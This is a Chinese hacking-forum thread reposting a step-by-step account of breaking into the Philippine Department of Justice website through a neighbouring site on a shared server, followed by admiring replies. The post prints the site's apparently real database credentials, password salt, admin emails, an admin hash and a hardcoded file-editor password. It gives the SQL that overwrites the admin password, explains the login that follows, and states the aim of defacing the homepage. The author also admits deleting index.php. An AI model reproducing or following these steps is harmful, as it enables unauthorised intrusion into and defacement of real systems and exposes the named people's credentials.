查看: 15664|回复: 12

[精品文章转载] 权限不足跨目录旁注 菲律宾司法局爆菊

[复制链接]
  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2012-5-28 18:14:15 | 显示全部楼层 |阅读模式
    作者:YoCo Smart
    来自:Silic Group Hacker Army
    http://blackbap.org

    这个站我随便搜的,忘了哪里总结的了。后来上去了才发现是菲律宾司法局啊(Department of Justice),怪就只能怪你命不好了
    首先看了一下网站,没看出是什么程序写的,也没发现值得深入下手的地方。于是干脆旁注了
    一分钟就拿下了同服务器上的一个网站firstmetro.com.ph(服务器上网站不少,可以自己试一下,这一部分不一定非要跟我的路子走的)
    这才发现,服务器支持asp,aspx,php,但是限制很多,你自己试一下就知道为什么限制很多了
    简单试了下没提权成功。反正拿服务器不是首要任务,首要任务是挂菊花聊天室,先挂上聊天室再提权(后来事实证明,还是先提权才能把主页挂上菊花的)。


    **************************好了,正文开始*****************************


    很庆幸,这个vhost网站能跨站读取源码,但是权限不够,可以用webshell跨站读取一部分网站的源码,但是不能直接拷贝或者上传文件到目录
    当然,意思就是不能直接对doj.goc.ph这个网站的目录中写入文件或者修改文件代码

    简单翻了一下网站目录,没有明显的后台登陆地址的标记


    登陆了一下MySQL账户,不是root,还是4.x,用处不大
    这几个目录中比较可疑的是:
    http://www.doj.gov.ph/doj2.0/c0ntent/login.php

    访问这个地址,这个目录明显就是后台,这货后台隐藏的也够深的。
    如果这是注入拿站,拿站的人是要死的,MySQL 4.x的版本,管理员表是doj_auth_users,字段是pangalan,密码是n位SALT的SHA512加密,后台又这么深,真的是基霸管理员啊

    后台隐藏这么深,我很怀疑是之前新闻说的菲律宾政府要求各部门加强网站安全性通知以后管理员抽风给做成这样的

    我先看了一下登录文件login.php的代码:

    [code=PHP]if (isset($_POST['submit'])) {
    if (empty($_POST['user']) || empty($_POST['pass'])) {
    $msg = "ERROR: Please check your input!";
    }
    /***** Calculate hashed password *****/
    $hash = new Crypt_Hash('sha512');
    $password = bin2hex($hash->hash(SALT.clean_field($_POST['pass'], 1)));
    $LOGINQUERY = "SELECT * FROM ".TBL_LOGIN." WHERE pangalan = '".clean_field(base64_encode($_POST['user']), 1)."'AND pasword = '".$password."'";
    $result = mysql_query($LOGINQUERY) or $msg = "Error executing query.";[/code]
    这段是密码验证部分的代码,简单来分析一下代码好了

    Calculate hashed password前面的部分是验证输入的不为空,这个很简单,Calculate hashed password后面是加密密码和验证的部分,这里就比较郁闷了

    pangalan应该是用户名的表段,而password明显就是密码的表段了。管理员字段是在:TBL_LOGIN 这个常量中存放的
    $password这个变量是经过加密的,看加密格式:
    [code=PHP]$password = bin2hex($hash->hash(SALT.clean_field($_POST['pass'], 1)));[/code]先将POST提交的密码一次处理(初步判断是去空格引号转义等功能)后,和SALT常量结合,然后hash加密

    那么我们再登陆数据库看看,登陆信息在include.php文件中,数据库的信息如下:
    [code=PHP]define ("HOST", "localhost");
    define ("USER", "dojmis");
    define ("ASS", "@ssw0rd123");
    define ("DATABASENAME", "wcms1");

    define ("ADMIN_EMAIL", "haroldtubangi@gmail.com");
    define ("ADMIN_EMAIL", "misd.doj@gmail.com, hgtubangi@doj.gov.ph, haroldtubangi@gmail.com");
    define ("SALT", "Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rds"); // salt to strenghten passwords
    define ("TBL_LOGIN", "doj_auth_users");[/code]用dojmis和密码P@ssw0rd123登陆数据库成功(我很怀疑[url=mailto@ssw0rd123]P@ssw0rd123[/url]就是FTP密码)执行以下SQL语句
    [code=PHP]select pangalan,0x3a,pasword from doj_auth_users[/code]上面的管理员表段名也是从include.php中找出来的,自己仔细看一下

    得到:bWJi:bb376d2738b4561ad15973058f7a5b420a644cf2a29e997e9a656268c2bbfa9337ea7b2032129c8e74aa13cefeaf2294d1f7a784cb5d8864a7c80ba17a10f83b

    我了个去,这么长的密文,跟md5看来是没关系了,直接逆向恐怕更、、、、不可能了

    那咱们就分析分析他的加密方式,根据他的加密方式,咱们自己制作一个密码,直接给他改密码好了,然后用咱们自己的密码登陆后台

    这中间有个clean_field()函数,这个函数在function.php中,其实看名字就知道是去空格等操作了,所以我们直接忽视
    上面的加密方式中有个SALT,那就先找SALT
    在include.php文件中:
    [code=PHP]define ("SALT", Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rds);[/code]这么长的SALT,如果不提前知道,怎么能跑的出来密码。不过好在我们已经知道了

    假定我要将密码设置为:silic,那么根据他的算法,加密前先和SALT混合,就是:
    Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rdssilic

    然后看看怎么进行hash加密
    看了这行代码:
    [code=PHP]$hash = new Crypt_Hash('sha512');[/code]应该是sha512八九不离十了。于是将
    Th1sSp3rL0ngStr1ngW1llPr0t3ctMyUs3rsAg@1nst1ns3cur3P@ssw0rdssilic进行SHA512加密以后就得到:c42c6c5c1e85c1ed0237576d4ff8ef3a7c145455a350fd43a489ce92f62f0633484b8b0c9b0ba8f5cad4401ef1c5285b6396d24ba144616127f2376d61459a6a

    得到了我们特定的密码的加密,然后就该修改数据库密码为我们的密码了。
    在数据库中执行SQL语句:
    [code=PHP]UPDATE doj_auth_users SET pasword='c42c6c5c1e85c1ed0237576d4ff8ef3a7c145455a350fd43a489ce92f62f0633484b8b0c9b0ba8f5cad4401ef1c5285b6396d24ba144616127f2376d61459a6a' WHERE pangalan='bWJi'[/code]
    就将后台的登陆密码修改为silic了

    但是这还没有结束,因为我们的目的是取到Webshell
    (其实这是图省事,因为咱们目的就是给他挂挂首页,取到Webshell足矣。但是。。。千万别抱这种想法,因为这个网站目测不提权是改不了主页的)

    在登陆后台前,需要注意一个地方:
    [code=PHP]WHERE pangalan = '".clean_field(base64_encode($_POST['user']), 1)."'AND pasword = '.....[/code]
    这里的用户名字段是pangalan,但是用户名是经过了base64加密的,数据库中的pangalan字段数据是bWJi,实际上的密码需要经过base64解密,解密后得到实际登陆用户名为:mbb
    用户名解出来了,密码自己给他改上去了。登陆后台

    后台很简陋(但是很牛逼,居然会封ip,而且从头至尾居然封了我好几个ip,最后一不小心把index.php文件删了,也算是解了封我ip的气)


    拿到webshell的话,发现只有一个fileedit.php可以加以利用,其他都是纯数据库操作
    我看了半天没看明白怎么用,两个输入框,左边长右边短

    还是仔细分析一下代码:
    [code=PHP]if ($_SESSION['fe_flag'] == 1) {
    $f=fopen ($_SESSION['fe_filename'],"rb");
    $_SESSION['fe_data']='';
    while(!feof($f))
    $_SESSION['fe_data'].=fread($f,filesize($_SESSION['fe_filename']));
    fclose($f);[/code]
    有一个fopen函数,这里显示确确实实可以修改文件。但是看后面,需要一个触发条件就是session的fe_flag的值为1
    看了一下HTTP Header,这个条件其实是不具备的。
    再来仔细看看代码,如何能得到这个session条件:
    [code=PHP]if (file_exists($_POST['titlepage']) and $_POST['comment'] == "L@br@d0r") {
    $_SESSION['fe_flag'] = 1;
    $_SESSION['fe_filename'] = $_POST['titlepage'];
    }[/code]仔细搜一下,果然又有一个密码验证,当POST的变量comment为密码时,就可以操作文件了

    这次看清楚了,应该是没有加密了,直接密码就是:L@br@d0r
    再来看一下这个功能框里面的源码,看看哪个是comment变量:
    [code=PHP]<form name="form1" method="post" action="fileedit.php">
    File: <input type="text" name="titlepage" value="" size="80" />  
    <input type="text" name="comment" value="" size="15" />
    <br /><br /><center><input type="submit" name='getfilename' value='Get File' /></center><br />
    </form>[/code]
    第一个输入框是文件名(titlepage变量),第二个输入框是密码(comment变量)
    当第二个框的变量通过了系统的密码验证,就将第一个变量接收并读取这个文件

    那么第一个框输入test.php第二个框输入[url=mailto@br@d0r]L@br@d0r[/url]就能修改test.php这个文件了








    PS:此文章个人感觉非常不错,大家不要做伸手党啊




    回复

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2012-5-29 09:46:38 | 显示全部楼层
    表情是亮点{:soso__10165175446970529289_2:}
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-5-29 11:43:46 | 显示全部楼层
    有没有视频教程
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-5-29 22:51:25 | 显示全部楼层
    很好很强大啊。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-10 09:55
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-5-30 11:40:36 | 显示全部楼层
    第一次见到sha512,他大爷的咋不去用同态....
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-5-2 11:56
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2012-5-30 13:48:22 | 显示全部楼层
    精品文章不要错过。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-3 02:53
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-6-10 21:55:27 来自手机 | 显示全部楼层
    文章说管理员很变态,看完之后我发现,作者更变态!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2023-6-3 10:47
  • 签到天数: 22 天

    [LV.4]偶尔看看III

    发表于 2012-6-10 22:12:43 | 显示全部楼层
    支持,慢慢消化 {:soso_e106:}
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-6-21 04:16:09 | 显示全部楼层
    我草 只看见菜刀链接  其余天书...
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-6-20 21:45
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-6-22 12:07:48 | 显示全部楼层
    确实不错 怎么没人加分
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 15:23 , Processed in 0.032940 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部